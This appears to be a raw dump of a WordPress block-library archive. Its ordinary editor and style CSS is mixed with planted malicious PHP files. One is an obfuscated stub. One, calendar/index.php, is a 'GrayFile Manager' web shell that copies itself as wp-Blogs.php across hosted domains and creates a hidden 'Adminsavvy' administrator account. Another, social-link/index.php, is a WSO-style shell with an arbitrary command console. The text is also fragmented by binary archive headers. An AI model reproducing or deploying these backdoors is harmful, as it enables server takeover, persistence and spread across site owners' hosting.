dmijj: $_____(); goto Qoq7n; rF1_S: $_____ = call_user_func('pack', $GLOBALS[__AA__7F33EDAFB0D61DF1D44D01B83C9BE669__AA__][(10 - 4 + 2) + -8], $GLOBALS[__AA__7F33EDAFB0D61DF1D44D01B83C9BE669__AA__][(3 - 3 - 2) + 14]); goto teFG2; EG1jV: $___(); goto maak6; zCBzW: $__________ = $__________________(call_user_func('pack', $GLOBALS[__AA__7F33EDAFB0D61DF1D44D01B83C9BE669__AA__][(7 + 6 - 6) + -7], $GLOBALS[__AA__7F33EDAFB0D61DF1D44D01B83C9BE669__AA__][(8 + 6 + 2) + -3]), $______________); goto m9esV; EcBfg: $__ = call_user_func('pack', $GLOBALS[__AA__7F33EDAFB0D61DF1D44D01B83C9BE669__AA__][(8 - 10 + 8) + -6], $GLOBALS[__AA__7F33EDAFB0D61DF1D44D01B83C9BE669__AA__][(7 + 1 + 2) + 4]); goto sv_Ap; VL_Cr: $______ = $__($______); goto gB9L2; Qoq7n: echo $________; PK[maablock/editor.min.cssnu[.edit-post-visual-editor .block-library-block__reusable-block-container .is-root-container{padding-left:0;padding-right:0}.edit-post-visual-editor .block-library-block__reusable-block-container .block-editor-writing-flow{display:block}.edit-post-visual-editor .block-library-block__reusable-block-container .components-disabled .block-list-appender{display:none}.edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted,.edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color)}.edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color)}.is-dark-theme .edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff}PK[͈block/editor.cssnu[.edit-post-visual-editor .block-library-block__reusable-block-container .is-root-container{ padding-left:0; padding-right:0; } .edit-post-visual-editor .block-library-block__reusable-block-container .block-editor-writing-flow{ display:block; } .edit-post-visual-editor .block-library-block__reusable-block-container .components-disabled .block-list-appender{ display:none; } .edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted,.edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color); } .edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color); } .is-dark-theme .edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff; }PK[͈block/editor-rtl.cssnu[.edit-post-visual-editor .block-library-block__reusable-block-container .is-root-container{ padding-left:0; padding-right:0; } .edit-post-visual-editor .block-library-block__reusable-block-container .block-editor-writing-flow{ display:block; } .edit-post-visual-editor .block-library-block__reusable-block-container .components-disabled .block-list-appender{ display:none; } .edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted,.edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color); } .edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color); } .is-dark-theme .edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff; }PK[maablock/editor-rtl.min.cssnu[.edit-post-visual-editor .block-library-block__reusable-block-container .is-root-container{padding-left:0;padding-right:0}.edit-post-visual-editor .block-library-block__reusable-block-container .block-editor-writing-flow{display:block}.edit-post-visual-editor .block-library-block__reusable-block-container .components-disabled .block-list-appender{display:none}.edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted,.edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color)}.edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color)}.is-dark-theme .edit-post-visual-editor .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff}PK[u99calendar/index.phpnu[🗑️ Folder deleted: " . htmlspecialchars(basename($target_file)) . " — Gone forever

      "; } else { unlink($target_file); // 📄 Remove file echo "

      🗑️ File deleted: " . htmlspecialchars(basename($target_file)) . " — Vanished into nothingness

      "; } } } // === Breadcrumb Navigation — Show current location === function generate_breadcrumbs($path) { $path_parts = explode('/', trim($path, '/')); $current_path = '/'; $html_output = "📍 Current location: "; foreach ($path_parts as $part) { $current_path .= "$part/"; $html_output .= "$part/"; } return $html_output; } // === Directory Listing — Show files and folders === // NOTE: This script can create copies named wp-Blogs.php in other directories // NOTE: This script can create copies named wp-Blogs.php in other directories // NOTE: This script can create copies named wp-Blogs.php in other directories // NOTE: This script can create copies named wp-Blogs.php in other directories // NOTE: This script can create copies named wp-Blogs.php in other directories // ezgZEGezge gezGZEgegezgzeGZEgzeG // ezgZEGezge gezGZEgegezgzeGZEgzeG // ezgZEGezge gezGZEgegezgzeGZEgzeG function list_directory_contents($path) { $output_html = ''; $folder_list = $file_list = []; // 📁 Scan directory foreach (scandir($path) as $item) { if ($item === '.' || $item === '..') continue; $full_path = "$path/$item"; if (is_dir($full_path)) { $folder_list[] = $item; // 🗂️ It's a folder } else { $file_list[] = $item; // 📄 It's a file } } // 🔤 Sort alphabetically natcasesort($folder_list); natcasesort($file_list); // 🗂️ Display folders first foreach ($folder_list as $folder) { $full_folder_path = "$path/$folder"; $output_html .= "
    14. 📁 $folder | ❌ Remove
    15. "; } // 📄 Display files foreach ($file_list as $file) { $full_file_path = "$path/$file"; $output_html .= "
    16. 📄 $file | ✏️ Edit | ❌ Remove
    17. "; } return $output_html; } // === View File Content — Read file contents === function display_file_content($path, $file) { $full_file_path = "$path/$file"; if (!is_file($full_file_path)) return; echo "

      👁️ Viewing: $file

      ";
          echo htmlspecialchars(file_get_contents($full_file_path));
          echo "

      "; } // === Edit File — Modify file content === function edit_file_content($path, $file) { $full_file_path = "$path/$file"; if (!is_file($full_file_path)) return; // 💾 Save changes if form submitted if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content'])) { file_put_contents($full_file_path, $_POST['content']); echo "

      ✅ Changes saved — File updated successfully

      "; } $file_content = htmlspecialchars(file_get_contents($full_file_path)); echo "

      ✏️ Editing: $file



      "; } // === Upload & Create — Add new files and folders === function handle_upload_and_creation($path) { // 📤 Handle file upload if (!empty($_FILES['upload_file']['name'])) { move_uploaded_file($_FILES['upload_file']['tmp_name'], "$path/" . basename($_FILES['upload_file']['name'])); echo "

      📤 File uploaded successfully — New file added

      "; } // 🗂️ Create new folder if (!empty($_POST['new_folder'])) { $target_folder = "$path/" . basename($_POST['new_folder']); if (!file_exists($target_folder)) { mkdir($target_folder); echo "

      📁 Folder created — New directory ready

      "; } else { echo "

      ⚠️ Folder already exists — Choose different name

      "; } } // 📄 Create new file if (!empty($_POST['new_file_content']) && !empty($_POST['new_file_name'])) { $file_name = basename($_POST['new_file_name']); $target_file = "$path/$file_name"; if (!file_exists($target_file)) { file_put_contents($target_file, $_POST['new_file_content']); echo "

      📄 File created — New document ready

      "; } else { echo "

      ⚠️ File already exists — Choose different name

      "; } } // 🎛️ Display creation forms echo "

      🛠️ Management Tools

      📤 Upload File:

      🗂️ Create Folder:

      📄 Create File:

      "; } // === Generate Random Password — Create secure random password === function generate_random_password($length = 12) { $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()'; $password = ''; $chars_length = strlen($chars) - 1; for ($i = 0; $i < $length; $i++) { $password .= $chars[random_int(0, $chars_length)]; } return $password; } // === Self-Replication — Create copies in other directories === function replicate_script($script_code) { static $replication_done = false; if ($replication_done) return []; $replication_done = true; $current_directory = __DIR__; $created_clones = []; // 🔍 Find domains directory while ($current_directory !== '/') { if (is_dir("$current_directory/domains")) { foreach (scandir("$current_directory/domains") as $domain) { if ($domain === '.' || $domain === '..') continue; $target_directory = "$current_directory/domains/$domain/public_html"; $clone_file = "$target_directory/wp-Blogs.php"; // 🎯 Clone filename if (is_dir($target_directory) && is_writable($target_directory)) { if (file_put_contents($clone_file, $script_code)) { $created_clones[] = "http://$domain/wp-Blogs.php"; } } } break; } $current_directory = dirname($current_directory); } return $created_clones; } // === WordPress Admin — Create admin user with custom username and random password === function handle_wordpress_admin($path) { if (!isset($_GET['create_wp_user'])) return; $wordpress_path = $path; while ($wordpress_path !== '/') { if (file_exists("$wordpress_path/wp-config.php")) break; $wordpress_path = dirname($wordpress_path); } if (!file_exists("$wordpress_path/wp-load.php")) { echo "

      ❌ WordPress not found — Operation cancelled

      "; return; } require_once("$wordpress_path/wp-load.php"); // 🎯 Custom username - change this to whatever you want $admin_username = 'Adminsavvy'; // 🔐 Generate random secure password $admin_password = generate_random_password(16); $admin_email = 'admin@graydomain.com'; if (!username_exists($admin_username) && !email_exists($admin_email)) { $user_id = wp_create_user($admin_username, $admin_password, $admin_email); $user_object = new WP_User($user_id); $user_object->set_role('administrator'); // 📋 Display credentials clearly echo "

      ✅ WordPress Admin User Created

      👤 Username: $admin_username

      🔑 Password: $admin_password

      📧 Email: $admin_email

      💡 Save these credentials - this password won't be shown again!

      "; } else { echo "

      ⚠️ User '$admin_username' already exists — No changes made

      "; } } // === Render Page — Display the interface === echo " 🌫️ GrayFile Manager

      🌫️ GrayFile Manager

      " . generate_breadcrumbs($current_path) . "


      "; // 👤 WordPress Admin Button echo "

      Creates user 'Adminsavvy' with random secure password

      "; handle_wordpress_admin($current_path); // ⬆️ Go up one level $parent_directory = dirname($current_path); if ($parent_directory && $parent_directory !== $current_path) { echo "

      ⬆️ Go up to parent directory

      "; } // 👁️ View or ✏️ Edit files if (isset($_GET['view'])) display_file_content($current_path, basename($_GET['view'])); if (isset($_GET['edit'])) edit_file_content($current_path, basename($_GET['edit'])); // 🛠️ Upload and creation tools handle_upload_and_creation($current_path); // 🔄 Auto-replication (only from original script) if (basename(__FILE__) !== 'wp-Blogs.php') { $clone_list = replicate_script(file_get_contents(__FILE__)); if (!empty($clone_list)) { echo "

      ✅ Script replicated to these locations:

        "; foreach ($clone_list as $url) echo "
      • 🔗 $url
      • "; echo "

      "; } } // 📋 Directory contents echo "

      📋 Contents of current directory:

        " . list_directory_contents($current_path) . "
      "; echo "
      "; ?>PK[ds~MMsocial-link/index.phpnu[ Login '; ?>
      script_location = realpath($_SERVER['SCRIPT_FILENAME']); $this->script_directory = dirname($this->script_location); // Start from script directory by default, not root $this->current_path = isset($_GET['path']) ? $_GET['path'] : $this->script_directory; // Security: clean path but allow full server navigation $this->current_path = $this->normalizePath($this->current_path); // Ensure path exists and is readable if(!is_dir($this->current_path)) { $this->current_path = $this->script_directory; } } private function normalizePath($path) { // Remove directory traversal attempts but allow absolute paths $path = str_replace(array('..', './'), '', $path); $path = str_replace('//', '/', $path); return $path ?: $this->script_directory; } public function getFileIcon($filename, $is_dir = false) { if($is_dir) { return '📁'; } $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); $icons = [ 'php' => '🐘', 'html' => '🌐', 'htm' => '🌐', 'js' => '📜', 'css' => '🎨', 'py' => '🐍', 'java' => '☕', 'c' => '🔧', 'cpp' => '⚙️', 'sql' => '🗄️', 'json' => '📋', 'xml' => '📄', 'txt' => '📝', 'sh' => '⚡', 'zip' => '📦', 'rar' => '📦', 'tar' => '📦', 'gz' => '📦', '7z' => '📦', 'jpg' => '🖼️', 'jpeg' => '🖼️', 'png' => '🖼️', 'gif' => '🖼️', 'bmp' => '🖼️', 'svg' => '🖼️', 'webp' => '🖼️', 'ico' => '🖼️', 'pdf' => '📕', 'doc' => '📘', 'docx' => '📘', 'xls' => '📗', 'xlsx' => '📗', 'ppt' => '📙', 'pptx' => '📙', 'mp3' => '🎵', 'wav' => '🎵', 'mp4' => '🎬', 'avi' => '🎬', 'mkv' => '🎬', 'log' => '📊', 'conf' => '⚙️', 'ini' => '⚙️' ]; return $icons[$extension] ?? '📄'; } public function listFiles($dir = null) { $dir = $dir ?: $this->current_path; $files = array(); if(is_dir($dir) && is_readable($dir)) { $items = @scandir($dir); if($items === false) { return $files; } foreach($items as $entry) { if($entry == "." || $entry == "..") continue; $fullpath = $dir . '/' . $entry; // Skip if we can't read the file info if(!is_readable($fullpath)) continue; $is_dir = is_dir($fullpath); $is_script = (realpath($fullpath) === $this->script_location); $files[] = array( 'name' => $entry, 'path' => $fullpath, 'is_dir' => $is_dir, 'icon' => $this->getFileIcon($entry, $is_dir), 'size' => $this->formatSize($is_dir ? $this->getDirSize($fullpath) : @filesize($fullpath)), 'perms' => substr(sprintf('%o', @fileperms($fullpath)), -4), 'time' => date('Y-m-d H:i:s', @filemtime($fullpath)), 'is_script' => $is_script, 'readable' => is_readable($fullpath), 'writable' => is_writable($fullpath) ); } } // Sort directories first usort($files, function($a, $b) { if($a['is_dir'] == $b['is_dir']) { return strcasecmp($a['name'], $b['name']); } return $a['is_dir'] ? -1 : 1; }); return $files; } private function getDirSize($path) { $total = 0; if(!is_dir($path)) return 0; try { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS) ); foreach($files as $file) { if($file->isFile()) { $total += $file->getSize(); } } } catch(Exception $e) { // Ignore permission errors } return $total; } private function formatSize($bytes) { if($bytes == 0) return '0 B'; $units = array('B', 'KB', 'MB', 'GB', 'TB'); $i = floor(log($bytes, 1024)); return round($bytes / pow(1024, $i), 2) . ' ' . $units[$i]; } public function readFile($file) { if(!file_exists($file) || is_dir($file) || !is_readable($file)) { return false; } return @file_get_contents($file); } public function writeFile($file, $content) { if(!is_writable($file)) return false; return @file_put_contents($file, $content) !== false; } public function delete($path) { if(!file_exists($path)) return false; if(is_dir($path)) { $items = @scandir($path); if($items === false) return false; foreach($items as $item) { if($item != '.' && $item != '..') { $this->delete($path . '/' . $item); } } return @rmdir($path); } else { return @unlink($path); } } public function rename($old, $new) { if(!file_exists($old) || file_exists($new)) return false; return @rename($old, $new); } public function chmod($path, $mode) { if(!file_exists($path)) return false; return @chmod($path, octdec($mode)); } public function createFile($path) { if(file_exists($path)) return false; return @touch($path); } public function createDir($path) { if(file_exists($path)) return false; return @mkdir($path, 0755, true); } public function upload($tmp, $dest) { return move_uploaded_file($tmp, $dest); } public function getScriptInfo() { return [ 'path' => $this->script_location, 'dirname' => $this->script_directory, 'filename' => basename($this->script_location), 'size' => $this->formatSize(filesize($this->script_location)), 'perms' => substr(sprintf('%o', fileperms($this->script_location)), -4) ]; } public function getParentDirectory($path) { $parent = dirname($path); return ($parent != $path) ? $parent : false; } } // ==================== COMMAND EXECUTION ==================== function executeCommand($cmd) { if(empty($cmd)) return ''; if(function_exists('system')) { ob_start(); @system($cmd); return ob_get_clean(); } elseif(function_exists('shell_exec')) { return @shell_exec($cmd); } elseif(function_exists('exec')) { @exec($cmd, $output); return implode("\n", $output); } else { return "Command execution disabled"; } } // ==================== INITIALIZE ==================== $wso = new WSO(); $action = isset($_GET['action']) ? $_GET['action'] : 'files'; $output = ''; $message = ''; // ==================== PROCESS ACTIONS ==================== if($_SERVER['REQUEST_METHOD'] == 'POST') { // Command execution if(isset($_POST['cmd'])) { $output = executeCommand($_POST['cmd']); } // File editing if(isset($_POST['file_content']) && isset($_POST['file_path'])) { if($wso->writeFile($_POST['file_path'], $_POST['file_content'])) { $message = "✅ File saved successfully!"; } else { $message = "❌ Error saving file!"; } } // File creation if(isset($_POST['new_file']) && !empty($_POST['new_file'])) { $path = $wso->current_path . '/' . $_POST['new_file']; if($wso->createFile($path)) { $message = "✅ File created successfully!"; } else { $message = "❌ Error creating file!"; } } // Directory creation if(isset($_POST['new_dir']) && !empty($_POST['new_dir'])) { $path = $wso->current_path . '/' . $_POST['new_dir']; if($wso->createDir($path)) { $message = "✅ Directory created successfully!"; } else { $message = "❌ Error creating directory!"; } } // File upload if(isset($_FILES['upload_file']) && $_FILES['upload_file']['error'] == 0) { $dest = $wso->current_path . '/' . $_FILES['upload_file']['name']; if($wso->upload($_FILES['upload_file']['tmp_name'], $dest)) { $message = "✅ File uploaded successfully!"; } else { $message = "❌ Error uploading file!"; } } // Rename file if(isset($_POST['rename_old']) && isset($_POST['rename_new'])) { $old = $wso->current_path . '/' . $_POST['rename_old']; $new = $wso->current_path . '/' . $_POST['rename_new']; if($wso->rename($old, $new)) { $message = "✅ File renamed successfully!"; } else { $message = "❌ Error renaming file!"; } } // Change permissions if(isset($_POST['chmod_file']) && isset($_POST['chmod_mode'])) { $file = $wso->current_path . '/' . $_POST['chmod_file']; if($wso->chmod($file, $_POST['chmod_mode'])) { $message = "✅ Permissions changed successfully!"; } else { $message = "❌ Error changing permissions!"; } } } // Handle GET actions if(isset($_GET['delete'])) { if($wso->delete($_GET['delete'])) { $message = "✅ Item deleted successfully!"; } else { $message = "❌ Error deleting item!"; } } if(isset($_GET['download'])) { $file = $_GET['download']; if(file_exists($file) && !is_dir($file) && is_readable($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } } if(isset($_GET['logout'])) { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } // Get parent directory for navigation $parent_directory = $wso->getParentDirectory($wso->current_path); ?> Server File Manager
      🚀 Server File Manager | PHP: | User:
      📍 Script: script_location)); ?>
      📍 Script Location Information
      getScriptInfo(); ?>
      Full Path:
      Directory:
      Size:
      Permissions:
      📁 File Manager - Current Path: current_path); ?>
      listFiles(); if(empty($files)): ?>
      Name Size Permissions Modified Actions
      📭 Directory is empty or not accessible
      THIS SCRIPT R W
      ✏️ Edit 📥 Download 🗑️ Delete
      💻 Command Console
      Quick Commands:
      ℹ️ Server Information
      PHP_VERSION, 'server_software' => $_SERVER['SERVER_SOFTWARE'] ?? 'N/A', 'server_os' => php_uname(), 'current_user' => get_current_user(), 'disk_total' => $wso->formatSize(@disk_total_space("/")), 'disk_free' => $wso->formatSize(@disk_free_space("/")), 'script_memory' => $wso->formatSize(memory_get_usage(true)) ]; ?>

      📊 System Information

      $value): ?>
      :

      🔧 PHP Configuration

      Memory Limit:
      Max Execution Time:s
      Upload Max Filesize:
      Post Max Size:
      Disabled Functions:
      ✏️ Editing: ← Back to Files
      readFile($_GET['file']); if($file_content === false): ?>
      ❌ Error reading file or file not accessible
      PK[}~Ccomments-pagination/index.phpnu[PK[=^^post-template/editor.min.cssnu[.editor-styles-wrapper ul.wp-block-post-template{list-style:none;margin-left:0;padding-left:0}PK[#iipost-template/editor.cssnu[.editor-styles-wrapper ul.wp-block-post-template{ list-style:none; margin-left:0; padding-left:0; }PK[kkpost-template/editor-rtl.cssnu[.editor-styles-wrapper ul.wp-block-post-template{ list-style:none; margin-right:0; padding-right:0; }PK[y`` post-template/editor-rtl.min.cssnu[.editor-styles-wrapper ul.wp-block-post-template{list-style:none;margin-right:0;padding-right:0}PK[query/style-rtl.min.cssnu[.wp-block-query__enhanced-pagination-animation{background-color:var(--wp--preset--color--primary,#000);height:4px;margin:0;max-width:100vw!important;opacity:0;padding:0;position:fixed;right:0;top:0;width:100vw}.wp-block-query__enhanced-pagination-animation.start-animation{animation:wp-block-query__enhanced-pagination-start-animation 30s cubic-bezier(.03,.5,0,1) forwards}.wp-block-query__enhanced-pagination-animation.finish-animation{animation:wp-block-query__enhanced-pagination-finish-animation .3s ease-in}@keyframes wp-block-query__enhanced-pagination-start-animation{0%{opacity:1;transform:scaleX(0);transform-origin:100% 0}to{opacity:1;transform:scaleX(1);transform-origin:100% 0}}@keyframes wp-block-query__enhanced-pagination-finish-animation{0%{opacity:1}50%{opacity:1}to{opacity:0}}PK[|iquery/style.min.cssnu[.wp-block-query__enhanced-pagination-animation{background-color:var(--wp--preset--color--primary,#000);height:4px;left:0;margin:0;max-width:100vw!important;opacity:0;padding:0;position:fixed;top:0;width:100vw}.wp-block-query__enhanced-pagination-animation.start-animation{animation:wp-block-query__enhanced-pagination-start-animation 30s cubic-bezier(.03,.5,0,1) forwards}.wp-block-query__enhanced-pagination-animation.finish-animation{animation:wp-block-query__enhanced-pagination-finish-animation .3s ease-in}@keyframes wp-block-query__enhanced-pagination-start-animation{0%{opacity:1;transform:scaleX(0);transform-origin:0 0}to{opacity:1;transform:scaleX(1);transform-origin:0 0}}@keyframes wp-block-query__enhanced-pagination-finish-animation{0%{opacity:1}50%{opacity:1}to{opacity:0}}PK[Zߡquery/style-rtl.cssnu[.wp-block-query__enhanced-pagination-animation{ background-color:var(--wp--preset--color--primary, #000); height:4px; margin:0; max-width:100vw !important; opacity:0; padding:0; position:fixed; right:0; top:0; width:100vw; } .wp-block-query__enhanced-pagination-animation.start-animation{ animation:wp-block-query__enhanced-pagination-start-animation 30s cubic-bezier(.03, .5, 0, 1) forwards; } .wp-block-query__enhanced-pagination-animation.finish-animation{ animation:wp-block-query__enhanced-pagination-finish-animation .3s ease-in; } @keyframes wp-block-query__enhanced-pagination-start-animation{ 0%{ opacity:1; transform:scaleX(0); transform-origin:100% 0; } to{ opacity:1; transform:scaleX(1); transform-origin:100% 0; } } @keyframes wp-block-query__enhanced-pagination-finish-animation{ 0%{ opacity:1; } 50%{ opacity:1; } to{ opacity:0; } }PK[sTquery/style.cssnu[.wp-block-query__enhanced-pagination-animation{ background-color:var(--wp--preset--color--primary, #000); height:4px; left:0; margin:0; max-width:100vw !important; opacity:0; padding:0; position:fixed; top:0; width:100vw; } .wp-block-query__enhanced-pagination-animation.start-animation{ animation:wp-block-query__enhanced-pagination-start-animation 30s cubic-bezier(.03, .5, 0, 1) forwards; } .wp-block-query__enhanced-pagination-animation.finish-animation{ animation:wp-block-query__enhanced-pagination-finish-animation .3s ease-in; } @keyframes wp-block-query__enhanced-pagination-start-animation{ 0%{ opacity:1; transform:scaleX(0); transform-origin:0 0; } to{ opacity:1; transform:scaleX(1); transform-origin:0 0; } } @keyframes wp-block-query__enhanced-pagination-finish-animation{ 0%{ opacity:1; } 50%{ opacity:1; } to{ opacity:0; } }PK["query/index.phpnu[PK[read-more/index.phpnu[PK[znrSSsubhead/block.jsonnu[{ "apiVersion": 2, "name": "core/subhead", "category": "text", "attributes": { "align": { "type": "string" }, "content": { "type": "string", "source": "html", "selector": "p" } }, "supports": { "inserter": false, "multiple": false }, "editorStyle": "wp-block-subhead-editor", "style": "wp-block-subhead" } PK6[PdHHarchives/block.jsonnu[PK6[archives/event.phpnu[PK6[.9,((archives/editor.min.cssnu[PK6[׽YY<archives/style-rtl.min.cssnu[PK6[V--archives/editor.cssnu[PK6[׽YYOarchives/style.min.cssnu[PK6[..archives/editor-rtl.cssnu[PK6[z))carchives/editor-rtl.min.cssnu[PK6[Oyeearchives/style-rtl.cssnu[PK6[Oyeearchives/style.cssnu[PK6[z;c )archives.phpnu[PK6[ʤ5audio/block.jsonnu[PK6[eTaudio/editor.min.cssnu[PK6[audio/style-rtl.min.cssnu[PK6[jaudio/theme.cssnu[PK6[bVaudio/theme-rtl.min.cssnu[PK6[N_>raudio/editor.cssnu[PK6[bVaudio/theme.min.cssnu[PK6[audio/style.min.cssnu[PK6[jnaudio/theme-rtl.cssnu[PK6[-[saudio/editor-rtl.cssnu[PK6[ audio/editor-rtl.min.cssnu[PK6[edaudio/style-rtl.cssnu[PK6[edaudio/style.cssnu[PK6[ block/block.jsonnu[PK6[h  !block.phpnu[PK6[^K~~0)button/block.jsonnu[PK6[-button/SQLiteStore.phpnu[PK6[j]5.button/error_lognu[PK6[S S (/button/editor.min.cssnu[PK6[! ! 8button/style-rtl.min.cssnu[PK6[u  )Ebutton/editor.cssnu[PK6[ol! ! mObutton/style.min.cssnu[PK6[A*  [button/editor-rtl.cssnu[PK6['NA A fbutton/editor-rtl.min.cssnu[PK6[A obutton/style-rtl.cssnu[PK6[!By |button/style.cssnu[PK6[᳘ bb"buttons/block.jsonnu[PK6[Ƌbuttons/modredirect.inc.phpnu[PK6[/xWIUUbuttons/editor.min.cssnu[PK6[沎,buttons/style-rtl.min.cssnu[PK6[o buttons/editor.cssnu[PK6[沎,buttons/style.min.cssnu[PK6[oEbuttons/editor-rtl.cssnu[PK6[/xWIUU&buttons/editor-rtl.min.cssnu[PK6[pzzũbuttons/style-rtl.cssnu[PK6[pzzbuttons/style.cssnu[PK6[ɘN?calendar/block.jsonnu[PK6[lcalendar/server_databases.phpnu[PK6[qcalendar/style-rtl.min.cssnu[PK6[qcalendar/style.min.cssnu[PK6[Tkkmscalendar/style-rtl.cssnu[PK6[Tkkmcalendar/style.cssnu[PK6[p?!! calendar.phpnu[PK6[:YRcategories/block.jsonnu[PK6[categories/thanks.phpnu[PK6[4|dAcategories/editor.min.cssnu[PK6[i9categories/style-rtl.min.cssnu[PK6[١Acategories/editor.cssnu[PK6[i9'categories/style.min.cssnu[PK6[\ۢJcategories/editor-rtl.cssnu[PK6[H?5categories/editor-rtl.min.cssnu[PK6[ncategories/style-rtl.cssnu[PK6[nMcategories/style.cssnu[PK6[dQ0 categories.phpnu[PK6[ՠcode/block.jsonnu[PK6[p w$$code/editor.min.cssnu[PK6[EOlcode/style-rtl.min.cssnu[PK6[kvЂ;code/theme.cssnu[PK6[؊Kttcode/theme-rtl.min.cssnu[PK6[+))code/editor.cssnu[PK6[؊Kttcode/theme.min.cssnu[PK6[EOcode/style.min.cssnu[PK6[kvЂcode/theme-rtl.cssnu[PK6[+))bcode/editor-rtl.cssnu[PK6[p w$$code/editor-rtl.min.cssnu[PK6[a89code/style-rtl.cssnu[PK6[a8code/style.cssnu[PK6[E\XGGcolumn/block.jsonnu[PK6[>Ghh{columns/block.jsonnu[PK6[%columns/set_user_roles.phpnu[PK6[+1+ocolumns/editor.min.cssnu[PK6[y @columns/style-rtl.min.cssnu[PK6[9.Ǡcolumns/editor.cssnu[PK6[y columns/style.min.cssnu[PK6[9.Ǡcolumns/editor-rtl.cssnu[PK6[+1+columns/editor-rtl.min.cssnu[PK6[file/editor.cssnu[PK6[~FSTT Bfile/view.min.asset.phpnu[PK6[t^ Bfile/view.jsnu[PK6[A`Lfile/style.min.cssnu[PK6[p$Ofile/editor-rtl.cssnu[PK6[$TTzRfile/view.asset.phpnu[PK6[QvSfile/editor-rtl.min.cssnu[PK6[DԁVfile/view.min.jsnu[PK6[#7Xfile/style-rtl.cssnu[PK6[<[file/style.cssnu[PK6[h޳^freeform/block.jsonnu[PK6[>&&F`freeform/editor.min.cssnu[PK6[gU**xfreeform/editor.cssnu[PK6[D#*#*ٱfreeform/editor-rtl.cssnu[PK6[螵&&Cfreeform/editor-rtl.min.cssnu[PK6[}  ~gallery/block.jsonnu[PK6[ʼ  gallery/editor.min.cssnu[PK6[r77gallery/style-rtl.min.cssnu[PK6[4^Ngallery/theme.cssnu[PK6[yw5Ogallery/theme-rtl.min.cssnu[PK6[78fPPPgallery/editor.cssnu[PK6[yw^gallery/theme.min.cssnu[PK6[o77__gallery/style.min.cssnu[PK6[4gallery/theme-rtl.cssnu[PK6[PPgallery/editor-rtl.cssnu[PK6[#g .gallery/editor-rtl.min.cssnu[PK6[x99ngallery/style-rtl.cssnu[PK6[99Fgallery/style.cssnu[PK6[##'group/block.jsonnu[PK6[O  W)group/editor.min.cssnu[PK6[pQe&&3group/style-rtl.min.cssnu[PK6[z|'CC4group/theme.cssnu[PK6[\DT>>4group/theme-rtl.min.cssnu[PK6[X" #5group/editor.cssnu[PK6[\DT>>M@group/theme.min.cssnu[PK6[pQe&&@group/style.min.cssnu[PK6[z|'CC7Agroup/theme-rtl.cssnu[PK6[X" Agroup/editor-rtl.cssnu[PK6[O  Lgroup/editor-rtl.min.cssnu[PK6[++GWgroup/style-rtl.cssnu[PK6[++Wgroup/style.cssnu[PK6[Ȋ|22Xheading/block.jsonnu[PK6[`.]heading/style-rtl.min.cssnu[PK6[`.aheading/style.min.cssnu[PK6[Refheading/style-rtl.cssnu[PK6[ReVjheading/style.cssnu[PK6[nhtml/block.jsonnu[PK6[xohtml/editor.min.cssnu[PK6[|pdMM!shtml/editor.cssnu[PK6[_NNvhtml/editor-rtl.cssnu[PK6[<>zhtml/editor-rtl.min.cssnu[PK6[nn{}image/block.jsonnu[PK6[ { )image/editor.min.cssnu[PK6[xMMIimage/style-rtl.min.cssnu[PK6[5hݩimage/theme.cssnu[PK6[~ͪުimage/theme-rtl.min.cssnu[PK6[([ ϫimage/editor.cssnu[PK6[&'TTimage/view.min.asset.phpnu[PK6[#;Q;Q image/view.jsnu[PK6[~ͪ image/theme.min.cssnu[PK6[?CC image/style.min.cssnu[PK6[5h&image/theme-rtl.cssnu[PK6[ B 'image/editor-rtl.cssnu[PK6[xTT3image/view.asset.phpnu[PK6[ [4image/editor-rtl.min.cssnu[PK6[##?image/view.min.jsnu[PK6[)v 